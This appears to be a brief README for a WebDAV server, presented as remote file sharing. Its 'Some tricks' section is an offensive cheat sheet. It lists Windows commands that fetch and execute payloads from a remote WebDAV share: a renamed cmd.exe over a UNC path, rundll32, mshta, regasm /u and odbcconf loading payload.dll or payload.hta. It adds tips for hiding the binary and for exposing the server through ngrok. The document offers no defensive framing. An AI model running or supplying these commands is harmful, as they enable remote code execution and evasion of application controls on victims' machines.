Set Up WebDAV Server for Remote File Sharing
Usage
Build:
chmod+x build.sh
.\build.sh
Start server:
chmod +x start.sh
.\start.sh 8080
Example
Just put the file in share
folder.
UNC PATH
\\[email protected]\folder
\\[email protected]@port\folder
Some tricks
\\[email protected]\folder\cmd.exe /c whoami
You can rename cmd.exe to any name you want, example:cmd.txt
More?
rundll32 \\webdavserver\folder\payload.dll
mshta \\webdavserver\folder\payload.hta
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
...
No VPS?
Try ngrok..